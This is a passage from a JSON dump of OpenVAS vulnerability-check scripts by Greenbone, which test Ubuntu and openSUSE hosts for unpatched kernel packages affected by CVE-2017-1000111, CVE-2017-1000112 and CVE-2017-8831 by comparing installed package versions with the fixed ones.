use\n this to cause a denial of service or execute arbitrary code. (CVE-2017-1000112)\n Andrey Konovalov discovered a race condition in AF_PACKET socket option handling\n code in the Linux kernel. A local unprivileged attacker could use this to cause\n a denial of service or possibly execute arbitrary code. (CVE-2017-1000111)\");\n script_tag(name:\"affected\", value:\"linux-lts-xenial on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3385-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3385-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-91-generic\", ver:\"4.4.0-91.114~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-91-generic-lpae\", ver:\"4.4.0-91.114~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-91-lowlatency\", ver:\"4.4.0-91.114~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-91-powerpc-e500mc\", ver:\"4.4.0-91.114~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-91-powerpc-smp\", ver:\"4.4.0-91.114~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-91-powerpc64-emb\", ver:\"4.4.0-91.114~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-91-powerpc64-smp\", ver:\"4.4.0-91.114~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-lts-xenial\", ver:\"4.4.0.91.75\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.91.75\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.91.75\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc-lts-xenial\", ver:\"4.4.0.91.75\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp-lts-xenial\", ver:\"4.4.0.91.75\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb-lts-xenial\", ver:\"4.4.0.91.75\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-xenial\", ver:\"4.4.0.91.75\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:23", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-08-11T00:00:00", "id": "OPENVAS:1361412562310843276", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843276", "title": "Ubuntu Update for linux USN-3384-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3384_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3384-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843276\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-11 07:22:37 +0200 (Fri, 11 Aug 2017)\");\n script_cve_id(\"CVE-2017-1000112\", \"CVE-2017-1000111\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3384-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Andrey Konovalov discovered a race condition\n in the UDP Fragmentation Offload (UFO) code in the Linux kernel. A local\n attacker could use this to cause a denial of service or execute arbitrary code.\n (CVE-2017-1000112) Andrey Konovalov discovered a race condition in AF_PACKET\n socket option handling code in the Linux kernel. A local unprivileged attacker\n could use this to cause a denial of service or possibly execute arbitrary code.\n (CVE-2017-1000111)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 17.04\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3384-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3384-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU17\\.04\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-1015-raspi2\", ver:\"4.10.0-1015.18\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-32-generic\", ver:\"4.10.0-32.36\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-32-generic-lpae\", ver:\"4.10.0-32.36\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-32-lowlatency\", ver:\"4.10.0-32.36\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.10.0.32.32\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.10.0.32.32\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.10.0.32.32\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.10.0.1015.16\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:07", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-08-11T00:00:00", "id": "OPENVAS:1361412562310843279", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843279", "title": "Ubuntu Update for linux USN-3386-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3386_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3386-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843279\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-11 07:22:48 +0200 (Fri, 11 Aug 2017)\");\n script_cve_id(\"CVE-2017-1000112\", \"CVE-2017-1000111\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3386-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Andrey Konovalov discovered a race condition\n in the UDP Fragmentation Offload (UFO) code in the Linux kernel. A local\n attacker could use this to cause a denial of service or execute arbitrary code.\n (CVE-2017-1000112) Andrey Konovalov discovered a race condition in AF_PACKET\n socket option handling code in the Linux kernel. A local unprivileged attacker\n could use this to cause a denial of service or possibly execute arbitrary code.\n (CVE-2017-1000111)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3386-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3386-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-128-generic\", ver:\"3.13.0-128.177\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-128-generic-lpae\", ver:\"3.13.0-128.177\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-128-lowlatency\", ver:\"3.13.0-128.177\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-128-powerpc-e500\", ver:\"3.13.0-128.177\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-128-powerpc-e500mc\", ver:\"3.13.0-128.177\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-128-powerpc-smp\", ver:\"3.13.0-128.177\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-128-powerpc64-emb\", ver:\"3.13.0-128.177\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-128-powerpc64-smp\", ver:\"3.13.0-128.177\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"3.13.0.128.137\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"3.13.0.128.137\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"3.13.0.128.137\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500\", ver:\"3.13.0.128.137\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"3.13.0.128.137\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"3.13.0.128.137\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"3.13.0.128.137\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"3.13.0.128.137\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:20", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-08-11T00:00:00", "id": "OPENVAS:1361412562310843275", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843275", "title": "Ubuntu Update for linux USN-3385-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3385_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3385-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843275\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-11 07:22:33 +0200 (Fri, 11 Aug 2017)\");\n script_cve_id(\"CVE-2017-1000112\", \"CVE-2017-1000111\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3385-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Andrey Konovalov discovered a race condition\n in the UDP Fragmentation Offload (UFO) code in the Linux kernel. A local\n attacker could use this to cause a denial of service or execute arbitrary code.\n (CVE-2017-1000112) Andrey Konovalov discovered a race condition in AF_PACKET\n socket option handling code in the Linux kernel. A local unprivileged attacker\n could use this to cause a denial of service or possibly execute arbitrary code.\n (CVE-2017-1000111)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3385-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3385-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1026-gke\", ver:\"4.4.0-1026.26\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1030-aws\", ver:\"4.4.0-1030.39\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1069-raspi2\", ver:\"4.4.0-1069.77\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1071-snapdragon\", ver:\"4.4.0-1071.76\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-91-generic\", ver:\"4.4.0-91.114\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-91-generic-lpae\", ver:\"4.4.0-91.114\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-91-lowlatency\", ver:\"4.4.0-91.114\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-91-powerpc-e500mc\", ver:\"4.4.0-91.114\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-91-powerpc-smp\", ver:\"4.4.0-91.114\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-91-powerpc64-emb\", ver:\"4.4.0-91.114\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-91-powerpc64-smp\", ver:\"4.4.0-91.114\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1030.32\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.91.96\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.4.0.91.96\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.4.0.1026.27\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.91.96\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.4.0.91.96\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.4.0.91.96\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.4.0.91.96\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.4.0.91.96\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.4.0.1069.69\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.4.0.1071.63\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:28:23", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2017-08-16T00:00:00", "id": "OPENVAS:1361412562310851594", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851594", "title": "openSUSE: Security Advisory for kernel (openSUSE-SU-2017:2169-1)", "type": "openvas", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851594\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-08-16 07:33:43 +0200 (Wed, 16 Aug 2017)\");\n script_cve_id(\"CVE-2017-1000111\", \"CVE-2017-1000112\", \"CVE-2017-8831\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for kernel (openSUSE-SU-2017:2169-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The openSUSE Leap 42.2 kernel was updated to receive various security and\n bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000111: Fixed a race condition in net-packet code that could\n be exploited to cause out-of-bounds memory access (bsc#1052365).\n\n - CVE-2017-1000112: Fixed a race condition in net-packet code that could\n have been exploited by unprivileged users to gain root access.\n (bsc#1052311).\n\n - CVE-2017-8831: The saa7164_bus_get function in\n drivers/media/pci/saa7164/saa7164-bus.c in the Linux kernel allowed\n local users to cause a denial of service (out-of-bounds array access) or\n possibly have unspecified other impact by changing a certain\n sequence-number value, aka a 'double fetch' vulnerability (bnc#1037994).\n\n The following non-security bugs were fixed:\n\n - IB/hfi1: Wait for QSFP modules to initialize (bsc#1019151).\n\n - bcache: force trigger gc (bsc#1038078).\n\n - bcache: only recovery I/O error for writethrough mode (bsc#1043652).\n\n - block: do not allow updates through sysfs until registration completes\n (bsc#1047027).\n\n - ibmvnic: Check for transport event on driver resume (bsc#1051556,\n bsc#1052709).\n\n - ibmvnic: Initialize SCRQ's during login renegotiation (bsc#1052223).\n\n - ibmvnic: Report rx buffer return codes as netdev_dbg (bsc#1052794).\n\n - iommu/amd: Fix schedule-while-atomic BUG in initialization code\n (bsc1052533).\n\n - libnvdimm, pmem: fix a NULL pointer BUG in nd_pmem_notify (bsc#1023175).\n\n - libnvdimm: fix badblock range handling of ARS range (bsc#1023175).\n\n - qeth: fix L3 next-hop im xmit qeth hdr (bnc#1052773, LTC#157374).\n\n - scsi_devinfo: fixup string compare (bsc#1037404).\n\n - scsi_dh_alua: suppress errors from unsupported devices (bsc#1038792).\n\n - vfs: fix missing inode_get_dev sites (bsc#1052049).\n\n - x86/dmi: Switch dmi_remap() from ioremap() to ioremap_cache()\n (bsc#1051399).\");\n\n script_tag(name:\"affected\", value:\"Linux Kernel on openSUSE Leap 42.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:2169-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~4.4.79~18.26.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base\", 